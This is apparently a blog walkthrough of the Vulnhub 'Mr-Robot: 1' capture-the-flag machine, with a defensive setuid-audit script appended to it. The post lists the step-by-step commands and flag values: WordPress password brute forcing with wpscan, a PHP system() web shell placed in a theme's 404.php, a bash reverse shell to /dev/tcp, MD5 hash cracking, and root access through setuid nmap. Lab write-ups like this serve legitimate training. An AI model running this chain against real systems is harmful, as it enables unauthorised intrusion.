Monday, October 14, 2019

Vulnhub: Mr-Robot: 1

source: https://www.vulnhub.com/entry/mr-robot-1,151/

192.168.1.103

80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

+ OSVDB-3092: /admin/: This might be interesting…
+ Uncommon header 'link' found, with contents: <http://192.168.1.103/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found

http://192.168.1.103/feed/
wordpress v4.3.20

http://192.168.1.103/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

http://192.168.1.103/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

http://192.168.1.103/fsocity.dic

https://mrrobot.fandom.com/wiki/Characters
username elliot

cat fsocity.dic | sort | uniq > fsocity_uniq.dic

wpscan --url http://192.168.1.103 --usernames elliot -P ./fsocity_uniq.dic
username elliot, password ER28-0652

wpscan --url http://192.168.1.103 --usernames mich05654 -P ./fsocity_uniq.dic
username mich05654, password Dylan_2791

Appearance->Editor 404.php
http://192.168.1.103/404.php

system('ls -la');
system('cat you-will-never-guess-this-file-name.txt');
hello there person who found me.

reverse shell:
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'");

find / -type f -name "key-2-of-3.txt" 2>/dev/null
/home/robot/key-2-of-3.txt

ls -l /home/robot
key-2-of-3.txt
password.raw-md5

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

john:
username robot, password abcdefghijklmnopqrstuvwxyz

python -c "import pty; pty.spawn('/bin/bash');"
su robot
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
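
A defensive counterpart to the `find / -perm -u=s` step above, as an added example that is not part of the original post: it lists setuid files and flags any whose name is on a short watch list of programs that can start a shell. The watch list is constructed for this example, and the function names `classify_suid`, `audit_suid` and `count_risky` are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original post): audit setuid files and flag
# programs that can hand out a shell, such as the nmap binary used above.

# Constructed watch list (an assumption of this example, not exhaustive):
# programs with an interactive mode or a command-execution feature.
RISKY="nmap vim vi find bash sh dash less more nano awk python perl ruby env"

# classify_suid: read one path per line on stdin, print "VERDICT<TAB>path".
# RISKY  = basename is on the watch list; the setuid bit should be removed.
# review = setuid but not on the list; compare against the distro baseline.
classify_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        verdict=review
        case " $RISKY " in
            *" $name "*) verdict=RISKY ;;
        esac
        printf '%s\t%s\n' "$verdict" "$path"
    done
}

# audit_suid: find setuid regular files under a root (default /), staying on
# one filesystem, and classify them.
audit_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | classify_suid
}

# count_risky: number of RISKY entries for the paths given on stdin.
count_risky() {
    classify_suid | awk '$1 == "RISKY" { n++ } END { print n + 0 }'
}
```

Calling `audit_suid /` on the machine in this walkthrough would report the setuid nmap binary as RISKY; `chmod u-s` on that file removes the escalation path.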

